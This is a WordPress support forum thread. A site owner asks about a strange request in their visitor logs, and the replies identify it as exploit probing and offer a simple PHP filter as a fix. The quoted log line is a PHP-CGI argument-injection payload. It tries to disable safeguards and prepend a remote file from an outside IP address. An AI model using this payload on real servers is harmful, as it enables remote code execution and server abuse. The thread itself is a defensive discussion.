Support » Everything else WordPress » Possible hack attempts? Strange links to my site

  • I am seeing some strange links that look like possible hack attempts in my visitor logs, and was wondering what they mean. The look like this:

    /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+
    -dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_
    prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt

    Anyone know what that is?

Viewing 6 replies - 1 through 6 (of 6 total)
  • Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    🏳️‍🌈 Halfelf Rogue & Plugin Review Team Rep

    Looks like someone’s testing for possible exploits.

    lovely… thanks for getting back to me on that. wonder if they found any! LOL! they’ve visited with this url over 300 times already. really annoying..

    dh

    (@danielhaim1)

    Definitely.

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    🏳️‍🌈 Halfelf Rogue & Plugin Review Team Rep

    Unlikely, but yeah, it’s annoying as hell.

    I cranked my firewall up to block people with 75 connections within 60 seconds.

    I don’t know how to do that. I have Better WP Security installed, but had to disable it (memory errors).

    I just started seeing the same code and this code will send spam from my server. This was the only post I found concerning this and google search was no help. I fixed it by added the following code to index.php:

    foreach ($_REQUEST as $key=>$value) {
            if (preg_match("/\-d/",$key)) {
                    unset($_REQUEST);
                    unset($_GET);
                    unset($_POST);
            }
    }

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Possible hack attempts? Strange links to my site’ is closed to new replies.